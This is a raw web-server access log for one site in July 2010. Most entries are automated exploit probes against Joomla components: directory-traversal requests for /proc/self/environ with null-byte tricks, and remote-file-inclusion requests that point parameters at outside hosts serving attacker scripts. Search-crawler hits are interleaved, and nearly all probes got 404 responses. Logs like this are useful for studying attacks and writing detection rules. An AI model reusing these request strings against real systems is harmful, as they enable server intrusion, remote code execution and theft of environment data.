217.16.18.219 - - [26/Jul/2010:08:33:27 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:42:31 -0700] "GET /logs/access.log//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:42:32 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [26/Jul/2010:08:42:33 -0700] "GET /logs//index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:44:41 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:44:45 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:44:49 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:44:54 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:44:56 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:44:56 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:44:56 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:44:59 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:45:22 -0700] "GET /logs/ HTTP/1.1" 200 2225 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:45:27 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:45:32 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:45:37 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
208.115.111.245 - - [26/Jul/2010:08:45:42 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:58 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:58 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:58 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:58 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:58 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.198.191.249 - - [26/Jul/2010:08:45:59 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://dareangel.info/cgi HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:47:26 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:47:26 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:47:26 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:47:59 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:48:00 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
62.140.247.99 - - [26/Jul/2010:08:48:00 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "vspeaking.com"
208.80.193.121 - - [26/Jul/2010:08:50:30 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; iebar; acc=vonner; FreeprodTB; (vonner); (none); .NET CLR 1.1.4322)" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:10 -0700] "GET /logs/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:10 -0700] "GET /?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:24 -0700] "GET /logs/access.log/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:31 -0700] "GET /?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:32 -0700] "GET /logs/access.log/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
202.29.92.6 - - [26/Jul/2010:08:57:32 -0700] "GET /logs/?option=com_sef&Itemid=&mosConfig.absolute.path=http://itg.nrct.go.th/itg/1.txt????? HTTP/1.1" 200 2225 "-" "Mozilla/5.0" "www.vspeaking.com"
83.93.131.189 - - [26/Jul/2010:08:59:17 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:08:59:41 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:08:59:41 -0700] "GET /index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:08:59:41 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:00:36 -0700] "GET /index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:00:37 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:00:37 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
217.16.18.219 - - [26/Jul/2010:09:04:34 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
217.16.18.219 - - [26/Jul/2010:09:07:57 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:12:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:13:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:13:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:14:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:14:34 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:14:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:15:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:15:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:15:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:15:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:16:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:17:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:17:30 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:17:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:17:30 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:18:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
67.195.37.180 - - [26/Jul/2010:09:18:56 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
83.204.37.229 - - [26/Jul/2010:09:19:48 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "www.vspeaking.com"
83.204.37.229 - - [26/Jul/2010:09:19:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.fr/search?q=92.246.14.11&hl=fr&client=firefox-a&hs=YP6&rls=org.mozilla:fr:official&channel=s&ei=n7VNTJf-DpK-4gb_x4iaDA&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:21:59 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:22:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:22:00 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:23:19 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:23:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:23:40 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:23:44 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:23:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:24:25 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:24:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:24:25 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:25 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:25 -0700] "GET /logs/access_100517.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:25 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:29 -0700] "GET /logs/access_100517.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:29 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:29 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
207.46.13.146 - - [26/Jul/2010:09:25:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:54 -0700] "GET /logs/access_100517.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:54 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
114.108.176.9 - - [26/Jul/2010:09:25:54 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:26:51 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
72.3.179.234 - - [26/Jul/2010:09:28:11 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
72.3.179.234 - - [26/Jul/2010:09:28:11 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
72.3.179.234 - - [26/Jul/2010:09:28:11 -0700] "GET /logs/access.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:29:19 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:29:19 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:29:20 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:31:05 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:31:05 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:31:06 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
178.154.160.30 - - [26/Jul/2010:09:31:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.vspeaking.com"
178.154.160.30 - - [26/Jul/2010:09:31:25 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.vspeaking.com"
83.93.131.189 - - [26/Jul/2010:09:33:14 -0700] "GET /index.php?option=com_comprofiler&mosConfig.absolute.path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:34:14 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:37:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:37:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:39:13 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:39:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:39:14 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
66.249.65.113 - - [26/Jul/2010:09:39:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:40:28 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:40:28 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:40:28 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
207.46.13.146 - - [26/Jul/2010:09:41:57 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:09:44:23 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
70.86.235.162 - - [26/Jul/2010:09:44:24 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:29 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:29 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:46:47 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:46:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:46:48 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:56 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:56 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
188.127.248.175 - - [26/Jul/2010:09:46:57 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:06 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:06 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
194.149.14.77 - - [26/Jul/2010:09:47:07 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
